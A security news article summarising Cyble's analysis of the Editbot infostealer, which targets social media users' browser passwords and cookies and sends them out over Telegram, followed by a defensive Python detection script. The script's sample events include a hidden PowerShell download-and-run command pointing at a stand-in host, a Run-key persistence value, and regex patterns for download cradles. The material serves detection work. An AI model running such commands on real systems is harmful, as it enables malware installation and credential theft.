Info Stealer Targeting Social Media Users


A new menace has emerged on the dark web: the Editbot stealer. Recently discovered by Cyble Research and Intelligence Labs (CRIL), this Python-based information stealer poses a significant risk to social media users’ sensitive data.

Initially detected in a WinRAR archive file on VirusTotal, the Editbot stealer exhibited minimal detection rates, prompting further analysis by CRIL.

What unfolded was a meticulously designed multi-stage attack aimed at evading detection, downloading additional payloads, and establishing persistence on the victim’s system.

[Figure: Editbot Stealer: The New Information Stealer on the Dark Web. Source: Cyble]

The campaign orchestrated by Threat Actors (TAs) involves leveraging open-source code-sharing platforms like Gitlab to fetch subsequent stage payloads. The downloaded payload, a Python-based stealer, is adept at pilfering critical information such as passwords, cookies, and web data. To complete its malicious agenda, the Editbot stealer utilizes a Telegram channel to transmit the stolen data back to the TAs.

[Figure: Editbot Stealer. Source: Cyble]

A Cyble Research and Intelligence Labs (CRIL) investigation on December 5th uncovered a potentially malicious RAR file on VirusTotal, and the appearance of similar files within a short timeframe prompted a swift examination. The identified archive file is linked to a deceptive social media scam that targets users with the premise of a ‘defective product to be sent back.’ TAs exploit the appeal of popular products to lure users into interacting with deceptive pages, expanding their reach through user engagement.

[Figure: Editbot Stealer information stealer. Source: Cyble]

The Editbot stealer employs a multi-stage infection strategy, utilizing a first-stage malicious batch file named “Screenshot Product Photo Sample.bat” and a JSON file named “manifest.json.” Through PowerShell commands, the TAs ensure persistence by downloading and executing the Python-based stealer at every login session.

[Figure: Editbot Stealer. Source: Cyble]

The Features and Capabilities of Editbot Stealer

[Figure: Features of Editbot Stealer. Source: Cyble]

The technical analysis of the Editbot stealer reveals a highly sophisticated piece of malware. The Python script “libb1.py” enumerates running processes, extracts sensitive information from various web browsers, and transmits the data to a specified Telegram channel.

[Figure: Editbot Stealer list of targeted browsers. Source: Cyble]

Upon execution, the stealer enumerates running processes and extracts sensitive information from browsers such as Chrome, Firefox, Edge, Opera, Brave-Browser, CocCoc, and Chromium. It retrieves the browser data files Cookies, Login Data, Web Data, and Local State and saves copies of them in a designated directory within the %temp% folder.

[Figure: Code for decrypting login details, Editbot Stealer. Source: Cyble]

The Editbot stealer then decrypts the stored passwords and saves the login details, URLs, and decrypted passwords in a text file named “pass.txt.” It also reads the SQLite database file “Cookies,” extracts the cookie information, and stores the details in “cookie.txt” if the cookie is associated with a social media site.
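The behaviours described above (the batch stage using PowerShell to download and run the Python stealer at every login, and the stealer copying the browser files Cookies, Login Data, Web Data, and Local State into %temp%) translate directly into host-based detection logic. The script below is an added example written for this article; it is not code from Cyble’s report or from the malware. It assumes Sysmon-style telemetry (process creation, file creation, registry value set) and assumes the login persistence is a Run key, which is one common mechanism and not something the report specifies. The sample events are constructed: every path, URL, and key name is invented, and only the two file names from the report (“Screenshot Product Photo Sample.bat” and “libb1.py”) are reused.

```python
import re
from typing import Dict, List, Tuple

# Constructed sample telemetry (not real logs) in a Sysmon-like shape:
# id 1 = process creation, 11 = file creation, 13 = registry value set.
# Only the two file names from the report are reused; everything else is invented.
SAMPLE_EVENTS: List[Dict[str, object]] = [
    {"id": 1, "image": r"C:\Windows\System32\cmd.exe", "parent_image": r"C:\Windows\explorer.exe",
     "cmdline": r'cmd.exe /c "C:\Users\v\Downloads\Screenshot Product Photo Sample.bat"'},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"powershell -w hidden -c Invoke-WebRequest https://gitlab.invalid/s2.zip -OutFile $env:TEMP\s2.zip; python $env:TEMP\libb1.py"},
    {"id": 13, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"HKU\S-1-5-21-1\Software\Microsoft\Windows\CurrentVersion\Run\Updater",
     "details": r"powershell -w hidden -c python C:\Users\v\AppData\Local\Temp\libb1.py"},
    {"id": 11, "image": r"C:\Users\v\AppData\Local\Programs\Python\python.exe",
     "target": r"C:\Users\v\AppData\Local\Temp\out\Chrome\Login Data"},
    {"id": 11, "image": r"C:\Users\v\AppData\Local\Programs\Python\python.exe",
     "target": r"C:\Users\v\AppData\Local\Temp\out\Chrome\Cookies"},
    # Benign activity that must not fire: the browser writing its own store
    # in its own profile directory, and an ordinary PowerShell command.
    {"id": 11, "image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\v\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe", "cmdline": "powershell -c Get-Process"},
]

# The four browser files the report says the stealer collects.
BROWSER_STORES = {"cookies", "login data", "web data", "local state"}
# Executable names of the browsers listed in the report (names assumed; CocCoc ships as browser.exe).
BROWSER_IMAGES = {"chrome.exe", "firefox.exe", "msedge.exe", "opera.exe", "brave.exe", "browser.exe"}
DOWNLOAD_CRADLE = re.compile(r"invoke-webrequest|\biwr\b|downloadstring|downloadfile|\bcurl\b|\bwget\b", re.I)
PY_LAUNCH = re.compile(r"\bpython(?:w|3)?(?:\.exe)?\b", re.I)
TEMP_DIRS = ("\\appdata\\local\\temp\\", "\\windows\\temp\\")


def basename(path: str) -> str:
    """Lower-cased final path component, tolerant of either slash style."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def under_temp(path: str) -> bool:
    """True if the path lies inside a per-user or system temp directory."""
    low = path.lower()
    return any(t in low for t in TEMP_DIRS)


def check_event(ev: Dict[str, object]) -> List[Tuple[str, str]]:
    """Return (rule_name, evidence) pairs for one event; empty list if nothing matched."""
    hits: List[Tuple[str, str]] = []
    img = basename(str(ev.get("image", "")))
    if ev["id"] == 1:
        cmd = str(ev.get("cmdline", ""))
        # Stage 1: PowerShell fetching a payload and handing it straight to python.
        if img.startswith("powershell") and DOWNLOAD_CRADLE.search(cmd) and PY_LAUNCH.search(cmd):
            hits.append(("powershell_download_to_python", cmd))
    elif ev["id"] == 13:
        target, details = str(ev.get("target", "")), str(ev.get("details", ""))
        # Persistence: a logon autorun value (assumed: Run key) that re-launches python
        # or re-downloads the payload at every login.
        if "\\currentversion\\run\\" in target.lower() and (
                PY_LAUNCH.search(details) or DOWNLOAD_CRADLE.search(details)):
            hits.append(("login_persistence_python", target))
    elif ev["id"] == 11:
        target = str(ev.get("target", ""))
        # Collection: a copy of a browser credential/cookie store appearing under %temp%,
        # written by a process that is not a browser.
        if basename(target) in BROWSER_STORES and under_temp(target) and img not in BROWSER_IMAGES:
            hits.append(("browser_store_copied_to_temp", target))
    return hits


def detect(events: List[Dict[str, object]]) -> List[Tuple[str, str]]:
    """Run every rule over a list of events and collect the findings in order."""
    findings: List[Tuple[str, str]] = []
    for ev in events:
        findings.extend(check_event(ev))
    return findings


if __name__ == "__main__":
    for rule, evidence in detect(SAMPLE_EVENTS):
        print(f"{rule}: {evidence}")
```

Against the constructed events this yields four findings: one for the PowerShell download cradle launching python, one for the login-time autorun value, and two for browser stores (Login Data and Cookies) being written under %temp% by python.exe. The browser writing its own Login Data in its profile directory and a plain PowerShell command produce nothing. The third rule is the one most worth keeping even if the other two are tuned away: a legitimate process has little reason to write a file named Cookies or Login Data into a temp directory.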

Media Disclaimer: This report is based on internal and external research obtained through various means. The information provided is for reference purposes only, and users bear full responsibility for their reliance on it. The Cyber Express assumes no liability for the accuracy or consequences of using this information.